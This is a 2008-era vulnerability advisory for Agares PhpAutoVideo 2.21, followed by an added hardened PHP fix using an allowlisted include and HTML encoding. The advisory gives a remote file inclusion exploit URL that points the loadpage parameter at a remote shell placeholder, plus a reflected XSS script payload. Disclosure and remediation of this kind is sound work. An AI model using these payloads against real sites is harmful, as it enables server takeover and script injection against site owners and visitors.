Agares PhpAutoVideo 2.21 (XSS/RFI) Multiple Remote Vulnerabilities

2008.01.23
Risk: High
Local: No
Remote: Yes
CWE: CWE-98

-----------------------------------------------------------------------------------
- Author : H-T Team { HouSSaMix & ToXiC350 } From MoRoCCo -
-----------------------------------------------------------------------------------

# Script : Agares PhpAutoVideo 2.21 and below
# Download : http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html
# BUG : (XSS/RFI) Multiple Remote Vulnerabilities

## Remote File Inclusion

[+] Vulnerable CODE :

~~~~~~~~~ /theme/phpAutoVideo/LightTwoOh/sidebar.php ~~~~~~~~~~~~~~~~~
<?PHP include($loadpage); ?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+] Exploit :

[Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[SH3LL]

=> other RFI was found in this script for version 2.21 ( http://www.milw0rm.com/exploits/4782 )

## XSS

exploit : %22%3E%3Cscript%3Ealert(1);%3C/script%3E

[Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
[Target.il]/[Path]/index.php?cat=<br>

XSS found by HouSSaMix and ToXiC350

=> works for all versions

-----------------------------------------------------------------------------------
- Gr33tz : coNan , GoLd_M , RoMaNcYxHaCkEr , Rachidox , and all muslims Hackers -
-----------------------------------------------------------------------------------
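
A hardened counterpart to the two flaws above, as an added example that is not code from PhpAutoVideo or from the advisory authors. The page keys, the pages/ directory and the helper names are hypothetical, and the cat value is assumed to be reflected inside a quoted HTML attribute. Because sidebar.php never assigns $loadpage itself, the original is only reachable with register_globals enabled, and a remote URL is only loaded when the PHP configuration allows URL includes; the fix below does not depend on either setting.

```php
<?php
// Added example, not PhpAutoVideo code. Page keys and the pages/ directory
// are hypothetical stand-ins for the files the theme really ships.
const SIDEBAR_PAGES = [
    'categories' => 'categories.php',
    'latest'     => 'latest.php',
];

// Map a requested key to a local file, or null when it is not allowed.
// The request value is only ever used as an array key, never as a path.
function resolve_sidebar_page($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !isset(SIDEBAR_PAGES[$requested])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . SIDEBAR_PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Encode a request value for HTML text or a quoted attribute.
function html_attr($value): string
{
    return htmlspecialchars(is_string($value) ? $value : '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// sidebar.php: read the parameter explicitly and include only allowlisted files.
$page = resolve_sidebar_page($_GET['loadpage'] ?? null, __DIR__ . '/pages');
if ($page !== null) {
    include $page;
} else {
    http_response_code(404);
}

// index.php: the reflected cat value is encoded, so a leading "> stays inert text.
echo '<input type="hidden" name="cat" value="' . html_attr($_GET['cat'] ?? '') . '">';
```

Requires PHP 7.1 or later. Setting allow_url_include=Off in php.ini is a useful second layer, but the allowlist is what removes the inclusion of attacker-chosen paths.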

